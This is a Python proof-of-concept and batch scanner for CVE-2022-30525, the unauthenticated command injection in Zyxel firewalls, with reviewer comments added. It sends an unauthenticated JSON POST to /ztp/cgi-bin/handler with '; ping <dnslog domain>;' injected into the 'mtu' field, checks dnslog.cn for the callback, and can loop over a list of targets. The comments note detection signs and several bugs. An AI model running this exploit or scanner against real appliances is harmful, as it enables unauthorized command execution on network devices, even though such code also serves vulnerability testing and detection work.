import requests import argparse import sys import urllib3 import json import time import random import signal
# Shared HTTP session for both dnslog.cn calls (Dnslog.get_dnslog / Dnslog.get_data).
# Presumably the session cookie is what links an issued domain to its records -- confirm.
dnslog_res = requests.session()
# Silences urllib3 warnings process-wide, including the InsecureRequestWarning that the
# verify=False request in information.target_url would otherwise emit.
urllib3.disable_warnings()

# Module metadata. In the visible code only __author__, __version__ and __link__ are
# read (by banner()). __desc__ translates to "CVE-2022-30525 batch verification using dnslog".
__desc__ = 'CVE-2022-30525利用dnslog批量验证'
__author__ = 'savior'
__date__ = '2022/05/14'
__version__ = 'v0.1'
__link__ = 'https://github.com/savior-only/CVE-2022-30525'
def banner() -> None:
    """Print the ASCII-art banner followed by the author, version and project link."""
    # The placeholders on the last line are filled from the module metadata constants.
    print(""" ██████ ██ ██ ████████ ████ ████ ████ ████ ████ ████ ██████ ████ ██████ ██░░░░██░██ ░██░██░░░░░ █░░░ █ █░░░██ █░░░ █ █░░░ █ █░░░ █ █░░░██░█░░░░ █░░░ █░█░░░░ ██ ░░ ░██ ░██░██ ░ ░█░█ █░█░ ░█░ ░█ ░ ░█░█ █░█░█████ ░ ░█░█████ ░██ ░░██ ██ ░███████ █████ ███ ░█ █ ░█ ███ ███ █████ ███ ░█ █ ░█░░░░░ █ ███ ░░░░░ █ ░██ ░░██ ██ ░██░░░░ ░░░░░ █░░ ░██ ░█ █░░ █░░ ░░░░░ ░░░ █░██ ░█ ░█ █░░ ░█ ░░██ ██ ░░████ ░██ █ ░█ ░█ █ █ █ ░█░█ ░█ █ ░█ █ █ ░█ ░░██████ ░░██ ░████████ ░██████░ ████ ░██████░██████ ░ ████ ░ ████ ░ ████ ░██████░ ████ ░░░░░░ ░░ ░░░░░░░░ ░░░░░░ ░░░░ ░░░░░░ ░░░░░░ ░░░░ ░░░░ ░░░░ ░░░░░░ ░░░░
by {} {} {} """.format(__author__, __version__, __link__))
class Dnslog:
    """Thin client for the public dnslog.cn out-of-band DNS logging service.

    Both functions are invoked on the class itself (``Dnslog.get_dnslog()``) and take
    no ``self``. They use the module-level ``dnslog_res`` session and read the
    module-level ``proxies`` mapping.

    NOTE(review): dnslog.cn is a third party reached over plain HTTP, so every issued
    domain and every lookup recorded against it is visible to that service and to the
    network path. Neither request sets a timeout.
    """

    def get_dnslog():
        """Request a fresh dnslog.cn domain.

        Returns the response body when the status is 200 and the body contains
        "dnslog"; otherwise prints a failure notice ("failed to get dnslog") and
        returns None.
        """
        rand_tag = random.random()
        endpoint = f"http://www.dnslog.cn/getdomain.php?t={rand_tag}"
        reply = dnslog_res.get(url=endpoint, proxies=proxies)
        if reply.status_code != 200 or "dnslog" not in reply.text:
            print("获取dnslog失败")
            return None
        return reply.text

    def get_data():
        """Return the raw body of dnslog.cn's getrecords.php, fetched over the shared session."""
        rand_tag = random.random()
        endpoint = f"http://www.dnslog.cn/getrecords.php?t={rand_tag}"
        return dnslog_res.get(url=endpoint, proxies=proxies).text
class information(object):
    """Runs the dnslog-based check against one URL or against every URL listed in a file.

    The check is active: it submits a command-injection payload to the target and
    infers the result from an out-of-band DNS lookup recorded by dnslog.cn.
    """

    def __init__(self,args) -> None:
        # args is the argparse namespace built in the __main__ block; only .url and
        # .file are read from it in this class.
        self.args = args
        self.url = args.url
        self.file = args.file

    def target_url(self) -> None:
        """Probe ``self.url`` once and print whether the injected command ran.

        Sends a JSON POST without credentials to ``<url>/ztp/cgi-bin/handler`` with
        a ``setWanPortSt`` command whose ``mtu`` field carries a shell ``ping`` of a
        freshly issued dnslog.cn domain, waits five seconds, then looks for that
        domain in dnslog.cn's record listing. A hit means the appliance executed
        the injected command.

        For detection: the request is a POST to ``/ztp/cgi-bin/handler`` whose
        ``mtu`` value is not numeric, and a positive result implies a DNS lookup
        of a dnslog.cn-issued name originating from the appliance.
        """
        target_url = self.url + "/ztp/cgi-bin/handler"
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
            "Content-Type": "application/json"
        }
        # NOTE(review): get_dnslog() returns None on failure; the payload would then
        # contain the text "None" and the `dnslog in data` test below raises TypeError.
        dnslog = Dnslog.get_dnslog()
        data = {"command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f"; ping {dnslog};", "data": "hi"}
        try:
            # verify=False: the target's TLS certificate is not validated.
            res = requests.post(url=target_url, headers=headers, data=json.dumps(data), verify=False, proxies=proxies, timeout=5)
        except Exception as e:
            # NOTE(review): every failure (timeout, refused connection, TLS error) is
            # swallowed, so an unreachable target is later reported as "not vulnerable".
            # `res` and `e` are never used.
            pass

        # Fixed wait before polling dnslog.cn for the callback.
        time.sleep(5)
        # `data` is rebound here: from the request payload to the dnslog.cn record text.
        data = Dnslog.get_data()
        if dnslog in data:
            # Message: "Target system: <url> has the Zyxel firewall unauthenticated
            # remote command injection" (printed in red).
            print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Zyxel 防火墙未经身份验证的远程命令注入\033[0m")
            print("[" + "-"*100 + "]")
        else:
            # Message: "Target system: <url> does not have the ... injection". A device
            # that cannot resolve external names also ends up here, so a negative
            # result is not proof that the device is patched.
            print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Zyxel 防火墙未经身份验证的远程命令注入!")
            print("[" + "-"*100 + "]")

    def file_url(self) -> None:
        """Run target_url() for every line of ``self.file``.

        Each line is stripped and prefixed with ``http://`` when it does not already
        start with "http". Blank lines are not skipped: they become "http://" and
        are probed as well. Targets are processed sequentially.
        """
        with open(self.file, "r") as urls:
            for url in urls:
                url = url.strip()
                if url[:4] != "http":
                    url = "http://" + url
                # Overwrites the instance's URL so target_url() probes the current line.
                self.url = url.strip()
                information.target_url(self)
if __name__ == "__main__":
    # Command-line entry point: print the banner, parse options, then check either a
    # single URL (-u) or every URL in a file (-f). Ctrl-C ends the run with a message.
    # The parser description translates to "Zyxel firewall unauthenticated remote
    # command injection".
    #
    # NOTE(review): `proxies` is bound only inside the -proxy branch, yet Dnslog and
    # information.target_url read it as a module global. A run without -proxy raises
    # NameError at the first dnslog.cn call, and only KeyboardInterrupt is caught here.
    try:
        banner()

        cli = argparse.ArgumentParser(
            description='Zyxel 防火墙未经身份验证的远程命令注入',
            add_help=False,
        )
        cli.add_argument("-h", "--help", action="help", help="Show this help message and exit")
        cli.add_argument("-u", "--url", type=str, dest="url", help="Target url eg:\"http://127.0.0.1\"")
        cli.add_argument("-f", "--file", dest="file", help="Targets in file eg:\"url.txt\"")
        cli.add_argument("-proxy", dest="proxy", help="Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)")
        args = cli.parse_args()

        if args.proxy:
            # The same proxy is applied to the dnslog.cn calls and the target request.
            proxies = dict(http=args.proxy, https=args.proxy)
            print("\033[31m[+] use proxy: {}\033[0m".format(args.proxy))

        # -u takes precedence over -f; with neither option nothing is checked.
        if args.url:
            information(args).target_url()
        elif args.file:
            information(args).file_url()
    except KeyboardInterrupt:
        print("\n\033[31mYou choose to stop me.\033[0m")